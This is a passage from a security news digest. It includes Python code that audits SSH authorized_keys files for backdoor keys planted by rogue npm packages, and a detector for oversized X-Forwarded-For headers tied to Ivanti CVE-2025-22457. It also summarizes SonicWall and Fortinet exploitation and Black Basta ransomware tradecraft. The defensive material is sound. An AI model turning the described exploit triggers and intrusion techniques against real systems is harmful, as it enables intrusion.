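    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")

def parse_authorized_keys(text):
    """Yield (options, key_type, blob, comment) per key line; blanks and '#' comments are skipped."""
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0].startswith("#"):
            continue
        idx = next((i for i, p in enumerate(parts) if p in KEY_TYPES), None)
        if idx is None or idx + 1 >= len(parts):
            continue  # unknown key type or missing blob: not a usable key line
        options = " ".join(parts[:idx])  # e.g. no-pty,command="..." (quoted spaces re-joined)
        yield options, parts[idx], parts[idx + 1], " ".join(parts[idx + 2:])

def audit_authorized_keys(text, approved_fingerprints):
    """Return every key whose fingerprint is not on the approved list."""
    unexpected = []
    for options, key_type, blob, comment in parse_authorized_keys(text):
        fp = fingerprint(blob)
        if fp not in approved_fingerprints:
            unexpected.append({"fingerprint": fp, "type": key_type,
                               "comment": comment, "options": options})
    return unexpected
```

Run it against the real file with `audit_authorized_keys(open(path).read(), approved)` for every account on the host, not only the one that ran npm.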

Recommended read:
References :
  • ciso2ciso.com: Rogue npm Packages Mimic Telegram Bot API to Plant SSH Backdoors on Linux Systems
  • Talkback Resources: Rogue npm Packages Mimic Telegram Bot API to Plant SSH Backdoors on Linux Systems
  • The Hacker News: Rogue npm Packages Mimic Telegram Bot API to Plant SSH Backdoors on Linux Systems
  • Talkback Resources: Talkback.sh discusses Rogue npm Packages Mimic Telegram Bot API to Plant SSH Backdoors on Linux Systems [app] [net] [mal]
  • ciso2ciso.com: Rogue npm Packages Mimic Telegram Bot API to Plant SSH Backdoors on Linux Systems – Source:thehackernews.com
  • linuxsecurity.com: We Linux security administrators face a growing challenge with sophisticated supply chain attacks targeting popular development ecosystems, such as npm.
  • securityonline.info: Malicious npm Packages Backdoor Telegram Bot Developers

sila.ozeren@picussecurity.com (Sıla@Resources-2 //
A Chinese cyber-espionage group, identified as UNC5221, is actively exploiting a zero-day vulnerability, CVE-2025-22457, in Ivanti Connect Secure. UNC5221 is suspected to be a China-nexus cyber-espionage group known for aggressively targeting edge network devices, such as VPNs, firewalls, and routers, with zero-day exploits since at least 2023. This vulnerability allows for unauthenticated remote code execution, giving attackers the ability to gain unauthorized access to organizations’ networks. The group has a history of quickly leveraging new flaws in Ivanti's Pulse Connect Secure/Ivanti Connect Secure (ICS) VPN appliances.

The latest campaign, launched in mid-March 2025, involves deploying the BRICKSTORM backdoor in targeted cyberespionage campaigns across Europe, including U.S.-based targets. This backdoor has evolved, with the Windows version now leveraging network tunneling capabilities and valid credentials to compromise Remote Desktop Protocol and Server Message Block, unlike the original Linux-targeting payload. The campaign is part of a broader trend of Chinese state-sponsored attackers focusing on internet-facing infrastructure for espionage, impacting government and enterprise networks globally.

Ivanti released a patch for CVE-2025-22457 on April 3, 2025, which affects Ivanti Connect Secure, Pulse Connect Secure, Ivanti Policy Secure, and ZTA Gateways. The vulnerability is a stack-based buffer overflow that can be exploited by sending a crafted HTTP request with an overly long X-Forwarded-For header. CISA has added the CVE to its Known Exploited Vulnerabilities (KEV) catalog and recommends immediate action. Organizations using vulnerable Ivanti devices are strongly advised to apply the patch immediately and continuously monitor their external attack surface.
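Since the advisory ties exploitation to an abnormal X-Forwarded-For header, a reverse proxy or WAF in front of the appliance can flag requests whose header is oversized or does not contain addresses. The Python below is an added example (ours, not Ivanti's or CISA's guidance); the length and hop thresholds, host name and request samples are assumptions constructed for the demonstration.

```python
import ipaddress

# Assumed thresholds: a legitimate proxy chain is a handful of addresses, well under these limits.
MAX_XFF_LENGTH = 256
MAX_XFF_ENTRIES = 8

# Constructed request header blocks (not captured traffic); the second carries an oversized value.
REQUESTS = [
    "GET / HTTP/1.1\r\nHost: vpn.example\r\nX-Forwarded-For: 203.0.113.7, 198.51.100.2\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: vpn.example\r\nX-Forwarded-For: " + "x" * 600 + "\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: vpn.example\r\nX-Forwarded-For: unknown, 2001:db8::1\r\n\r\n",
]

def parse_headers(raw):
    """Split a raw request into (request_line, [(name_lower, value), ...])."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers

def xff_anomalies(raw):
    """Return the reasons an X-Forwarded-For header looks abnormal; an empty list means clean."""
    _, headers = parse_headers(raw)
    values = [v for name, v in headers if name == "x-forwarded-for"]
    reasons = []
    if len(values) > 1:
        reasons.append("multiple X-Forwarded-For headers")
    for value in values:
        if len(value) > MAX_XFF_LENGTH:
            reasons.append(f"length {len(value)} exceeds {MAX_XFF_LENGTH}")
        entries = [e.strip() for e in value.split(",")]
        if len(entries) > MAX_XFF_ENTRIES:
            reasons.append(f"{len(entries)} hops exceeds {MAX_XFF_ENTRIES}")
        for entry in entries:
            if entry == "unknown":  # RFC 7239 allows this literal for an unidentified hop
                continue
            try:
                ipaddress.ip_address(entry)
            except ValueError:
                reasons.append(f"non-address entry {entry[:16]!r}")
                break
    return reasons

def scan(requests):
    """Return (index, reasons) for every request with an anomalous X-Forwarded-For header."""
    return [(i, xff_anomalies(r)) for i, r in enumerate(requests) if xff_anomalies(r)]
```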

Recommended read:
References :
  • watchTowr Labs: Watchtowr description
  • Resources-2: Who Is the China-Nexus Group UNC5221? UNC5221 is a suspected China-nexus cyber-espionage group known for aggressively targeting edge network devices (VPNs, firewalls, routers) with zero-day exploits since at least 2023.
  • www.scworld.com: Organizations across Europe are having their Windows systems compromised with the BRICKSTORM backdoor linked to Chinese state-backed threat operation UNC5221 as part of a cyberespionage campaign that commenced three years ago, Infosecurity Magazine reports.
  • blog.criminalip.io: Response Strategy for Ivanti VPN Vulnerability CVE-2025-22457: CTI-Based Attack Surface Detection

Krista Lyons@OpenVPN Blog //
References: Blog, OpenVPN Blog
Multiple security vulnerabilities are currently being exploited in Fortinet and SonicWall products, posing a significant risk to organizations using these devices. The Cybersecurity and Infrastructure Security Agency (CISA) has taken notice, adding the SonicWall SMA100 Appliance flaw (CVE-2021-20035) to its Known Exploited Vulnerabilities catalog, urging federal agencies to apply mitigations by May 7, 2025. This vulnerability, which impacts SonicWall SMA 200, SMA 210, SMA 400, SMA 410, and SMA 500v devices, allows remote authenticated attackers to inject arbitrary operating system commands.

Attackers have been actively exploiting the SonicWall SMA100 vulnerability (CVE-2021-20035) since January 2025. SonicWall has updated its security advisory to reflect the current active exploitation of the flaw, which can lead to code execution rather than only a denial of service. While the vulnerability affects SMA100 devices running older firmware, customers are urged to upgrade to the latest firmware. In addition to the SonicWall vulnerability, threat actors are employing new techniques to exploit a 2023 FortiOS flaw (CVE-2023-27997). This involves manipulating symbolic links during the device's boot process, allowing attackers with prior access to maintain control even after firmware updates.

Fortinet has released security updates for FortiOS and FortiGate. Organizations using Fortinet products should apply the latest patches. Similarly, SonicWall users are advised to upgrade to the fixed firmware versions, specifically 10.2.1.1-19sv and higher, 10.2.0.8-37sv and higher, or 9.0.0.11-31sv and higher. Although both SonicWall and CISA have confirmed that CVE-2021-20035 is being exploited, details about the attacks remain scarce.

Recommended read:
References :
  • Blog: Threat actors using new technique to exploit 2023 FortiOS flaw
  • OpenVPN Blog: SonicWall VPN Exploited, 16,000 Fortinet Devices Compromised | OpenVPN

@detect.fyi //
References: detect.fyi, medium.com, wazuh.com ...
The Black Basta ransomware group has demonstrated remarkable resilience and adaptability despite a significant leak of their internal communications, which occurred in the first quarter of 2025. Analysis of the leaked chat logs confirms that key actors within the group, operating under aliases like @usernamegg, @lapa, and @usernameugway, continue to coordinate attacks using shared infrastructure and custom tools. This indicates a high level of operational security and a focus on long-term planning, as the group rotates delivery domains, stages different botnets for specific functions, and carefully avoids detection through staggered attack timing and limited-volume delivery. The group's persistence highlights the challenges faced by defenders in disrupting sophisticated cybercrime enterprises.

Their tactics, techniques, and procedures (TTPs) align closely with those attributed by Microsoft to groups like Storm-1674, Storm-1811, and Storm-2410. These include exploiting vulnerabilities in Citrix and VPN portals, targeting weak authentication on ESXi hypervisors, employing credential stuffing attacks, and leveraging remote access utilities and scripts for payload delivery. Black Basta has also shown an increasing emphasis on social engineering, such as impersonating IT support staff via phone calls, mirroring techniques associated with Storm-2410. This adaptability and willingness to evolve their attack methods underscore the group's sophistication.

Black Basta's operations involve a multi-stage attack chain, starting with initial access gained through various methods, including exploiting vulnerabilities in unpatched systems, phishing campaigns, and social engineering tactics such as impersonating IT help desks via Microsoft Teams. The group also employs lightweight downloaders, memory-based loaders, and obfuscated commands via tools like PowerShell and rundll32.exe, indicating a shift toward stealthier and more precise attack delivery. Detection methods for Black Basta include configuring Endpoint Detection and Response (EDR) tools to look for unusual file behavior, command-line activity, registry changes, and network traffic.

Recommended read:
References :
  • detect.fyi: Analysis of Black Basta's ransomware resilience and evolution after a data leak.
  • medium.com: Information on Black Basta's use of lightweight downloaders, memory-based loaders, and obfuscated commands.
  • valhalla.nextron-systems.com: Report on Black Basta's ransomware operations.
  • wazuh.com: Analysis of the leaked Black Basta chat logs revealing their operational methods.